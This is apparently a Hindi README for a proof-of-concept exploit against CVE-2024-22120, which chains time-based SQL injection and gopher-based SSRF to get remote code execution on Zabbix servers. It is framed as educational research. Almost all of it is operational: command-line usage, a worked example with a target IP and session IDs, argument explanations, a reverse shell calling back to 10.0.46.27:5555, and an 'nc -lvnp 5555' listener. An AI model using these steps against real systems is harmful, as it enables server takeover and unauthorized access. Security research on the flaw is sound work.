
CVE-2024-22120 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो समय-आधारित SQL इंजेक्शन और गोफर-आधारित SSRF का लाभ उठाकर शैक्षणिक सुरक्षा अनुसंधान के लिए कमजोर Zabbix सर्वरों पर रिमोट कोड निष्पादन प्राप्त करता है।
python exploit.py --ip <Zabbix_IP> --sid <LowPrivileged_SID> --hostid <HostID> --phpsessid <PHPSESSID> --false_time <FalseTime> --true_time <TrueTime>
आपने IP 192.168.1.100 पर चलने वाले एक Zabbix सर्वर की पहचान की है, और आपके पास निम्नलिखित विवरण वाले कम-विशेषाधिकार वाले उपयोगकर्ता तक पहुंच है:
sid): d82bf6715e1d3c1f25hostid): 10107phpsessid): a4g7f48d9j3r7h8s9gआप इस स्क्रिप्ट का उपयोग करके RCE भेद्यता का शोषण करना चाहते हैं।
python exploit.py --ip 192.168.1.100 --sid d82bf6715e1d3c1f25 --hostid 10107 --phpsessid a4g7f48d9j3r7h8s9g --false_time 1 --true_time 3
--ip 192.168.1.100: Zabbix सर्वर का IP पता।--sid d82bf6715e1d3c1f25: कम-विशेषाधिकार वाले उपयोगकर्ता का सत्र ID।--hostid 10107: एक होस्ट का ID जिस तक कम-विशेषाधिकार वाला उपयोगकर्ता पहुंच सकता है।--phpsessid a4g7f48d9j3r7h8s9g: अनुरोधों को प्रमाणित करने के लिए उपयोग किया जाने वाला PHP सत्र ID।--false_time 1: SQL इंजेक्शन के दौरान गलत अनुमान की स्थिति में सोने का समय सेकंड में (डिफ़ॉल्ट 1 सेकंड)।--true_time 3: SQL इंजेक्शन के दौरान सही अनुमान की स्थिति में सोने का समय सेकंड में (डिफ़ॉल्ट 3 सेकंड)।10.0.46.27:5555 स्क्रिप्ट में) पर आपकी मशीन से वापस कनेक्ट होगा।सुनिश्चित करें कि आपकी मशीन रिवर्स शेल को पकड़ने के लिए निर्दिष्ट पोर्ट (5555 स्क्रिप्ट में) पर सुन रही है। इसके लिए आप netcat का उपयोग कर सकते हैं:
nc -lvnp 5555
रिवर्स शेल प्राप्त करने के लिए CreateScript फ़ंक्शन में IP 10.0.46.27 और पोर्ट 5555 को अपने स्वयं के IP और वांछित पोर्ट से बदलें।